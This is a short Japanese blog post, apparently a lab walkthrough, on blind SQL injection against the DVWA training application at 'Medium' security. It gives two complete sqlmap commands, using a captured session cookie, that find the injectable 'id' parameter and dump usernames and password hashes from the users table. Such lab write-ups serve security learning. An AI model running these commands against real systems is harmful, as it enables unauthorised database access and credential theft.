DVWAでSQL Injection(Blind)(Medium)

Hello there,

セキュリティレベルを『Medium』へ。

動作を確認してみて。

f:id:ThisIsOne:20191225104430p:plain

Burp Suiteからクッキー情報を取り出して。

f:id:ThisIsOne:20191225104656p:plain

下記のようにsqlmapを実行すると。

idについて、脆弱性が検出されて。

　sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/#" --cookie="PHPSESSID=06nsu44nk0h52rmfmqdgbrdpq1; security=medium" --data "id=5&Submit=Submit" -p id

f:id:ThisIsOne:20191225105223p:plain

さらには、以下のようにsqlmapにパラメータを追加して実行すると。

パスワードを抜き出すことができた。

　sqlmap -u "http://172.17.0.2/vulnerabilities/sqli_blind/#" --cookie="PHPSESSID=06nsu44nk0h52rmfmqdgbrdpq1; security=medium" --data "id=5&Submit=Submit" -p id -D dvwa -T users -C user,password --dump

f:id:ThisIsOne:20191225105642p:plain

Best regards,

Shikata Ga Nai

Private? There is no such things.

DVWAでSQL Injection(Blind)(Medium)